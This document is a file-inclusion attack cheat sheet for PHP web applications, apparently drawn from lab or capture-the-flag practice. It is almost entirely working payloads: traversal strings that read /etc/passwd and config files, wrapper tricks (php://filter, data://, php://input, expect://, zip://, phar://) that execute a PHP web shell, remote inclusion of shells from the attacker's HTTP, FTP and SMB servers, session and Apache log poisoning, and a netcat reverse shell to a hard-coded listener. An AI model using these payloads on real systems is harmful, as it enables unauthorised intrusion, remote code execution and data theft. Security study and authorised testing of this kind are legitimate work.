LFI

/etc/passwd

../../../etc/passwd

/../../../etc/passwd

....//....//....//etc/passwd

/..//..//..//..//..//..//etc/passwd

..%2F..%2F..%2Fetc%2Fpasswd%0A

./languages/../../../../etc/passwd

/etc/./passwd

/etc/passwd%00

/etc/passwd%00.php
# %00 (null byte) terminates the path, so an extension the app appends (e.g. .php) is dropped;
# this only works on PHP older than 5.3.4

?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
# path truncation: older PHP (before 5.3/5.4) cuts paths longer than 4096 bytes, which drops an appended
# extension; the path must start with a non-existing directory and be padded with ./ past that limit
# Discover the config file name with ffuf/gobuster (e.g. config.php) so it can be read through php://filter.
# The app appends ".php" to the included name, so "resource=config" resolves to config.php;
# the convert.base64-encode filter returns the source instead of executing it — decode the result afterwards.
# NOTE(review): host/port are lab-specific; the wordlist path matches a Kali seclists install.
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://94.237.62.149:55270/blog/FUZZ.php

/index.php?language=php://filter/read=convert.base64-encode/resource=config

# Decode the base64 output to recover the PHP source of config.php
echo 'PD9waHAK...SNIP...KICB9Ciov' | base64 -d
# Check whether allow_url_include is On in php.ini: the data://, php://input and remote http/ftp
# inclusions below depend on it, and with it enabled the LFI becomes RCE
/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini

> curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini" > php-ini.txt

> echo 'BASE64 OF php.ini' | base64 -d | grep allow_url_include

# data:// wrapper: base64-encode the PHP web shell and pass it inline, with cmd as a second parameter.
# URL-encode "+" and "=" in the base64 (%2B, %3D) — a literal "+" in the query string decodes to a space.
> echo '<?php system($_GET["cmd"]); ?>' | base64

/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

> curl -s 'http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid

# Alternative: php://input includes the raw POST body as PHP (also requires allow_url_include)
> curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid

# Alternative: expect:// runs a system command directly, but only when the expect extension is loaded —
# check the decoded php.ini for it before trying
> echo 'BASE64 OF php.ini' | base64 -d | grep expect

> curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
# RFI check: include the app's own index.php over HTTP; if the page comes back, remote URLs are fetched and included
?language=http://127.0.0.1:80/index.php

# Remote include over HTTP: serve shell.php from your machine, e.g. python3 -m http.server <LISTENING_PORT>
> echo '<?php system($_GET["cmd"]); ?>' > shell.php
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id

# Remote include over FTP: pyftpdlib serves the current directory with anonymous access on port 21
> sudo python -m pyftpdlib -p 21

/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id

# If anonymous FTP login is refused, put credentials in the URL
> curl 'http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id'

# Remote include over SMB (Windows targets — PHP on Windows resolves UNC paths; the target must reach your host on 445)
> impacket-smbserver -smb2support share $(pwd)

/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami
# With an upload feature: give the shell an allowed extension and image magic bytes (GIF8) so content
# checks pass, then include it from the upload directory (profile_images here — confirm the real path)
> echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
/index.php?language=./profile_images/shell.gif&cmd=id

# zip:// wrapper: pack shell.php into an archive named .jpg, then include zip://<archive>#<entry> (%23 is "#" URL-encoded)
> echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id
<?php
// Build shell.phar: a phar archive whose single entry, shell.txt, holds a PHP web shell.
// Must run with phar.readonly=0; the archive is afterwards renamed to .jpg and reached
// through the phar:// wrapper as phar://<archive>/shell.txt.
$archive = new Phar('shell.phar');
$archive->startBuffering();
// Entry name and content are fixed — the include path below references shell.txt
$archive->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
// Minimal stub: makes the file a valid phar without running anything on its own
$archive->setStub('<?php __HALT_COMPILER(); ?>');
$archive->stopBuffering();
-------------------------------------------------------------------------------------
# Save the script above as shell.php, build the archive (phar.readonly must be 0) and disguise it as .jpg;
# include it as phar://<archive>/<entry> (%2F is "/" URL-encoded)
> php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
# PHP session poisoning: the session file is sess_<PHPSESSID cookie value>; include it first to see what the app stores.
# /var/lib/php/sessions is the Debian/Ubuntu default — check session.save_path in php.ini if it is not there.
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd

# Set the parameter to the URL-encoded web shell so it gets written into the session file
# (works because the app appears to store the language value in the session — verify it in the step above)
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
<?php system($_GET["cmd"]);?>

# Then include the session file again with cmd set to the command to run
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id

# NOTE: repeat the poisoning before every command — each inclusion stores the session file path as the new
# language value, overwriting the web shell
  • Apache log poisoning: first set the User-Agent to a marker such as "Apache Log Poisoning" and include the
    access log (/var/log/apache2/access.log on Debian/Ubuntu) to confirm the header is written there

  • Then send the web shell below as the User-Agent (the surrounding quotes are not part of the header).
    A syntax error in the injected PHP breaks every later inclusion of that log, so get the payload right the first time

'<?php system($_GET["cmd"]);?>'

Or we could use this curl command

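# Inject the web shell through the User-Agent header with curl.
# The PHP must use double quotes around "cmd": the original '<?php system($_GET['cmd']); ?>' closed the
# single-quoted shell argument at $_GET and sent "$_GETcmd", which is invalid PHP and would also break the log.
curl -s 'http://<SERVER_IP>:<PORT>/index.php' -A '<?php system($_GET["cmd"]); ?>'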

For a reverse shell from the poisoned log, start a listener first (nc -lvnp 4444), then pass the command below
as the cmd parameter; 10.9.193.229:4444 is the author's listener — replace it with yours and re-encode

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.193.229 4444 >/tmp/f

URL-encoded form of the same command (this is the value that goes into cmd=):

%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%39%2e%31%39%33%2e%32%32%39%20%34%34%34%34%20%3e%2f%74%6d%70%2f%66

# Parameter discovery: -fs 2287 hides responses of the baseline size (the lab's default page) — measure your
# own baseline with a dummy request first. Wordlist paths are the HTB box layout (/opt/useful/SecLists); adjust.
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

# LFI payload list against the known parameter
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

# Locate the web root by including index.php from candidate document roots
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287

# Read common Linux files (logs, configs) once traversal works; LFI-WordList-Linux is a local wordlist file
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287
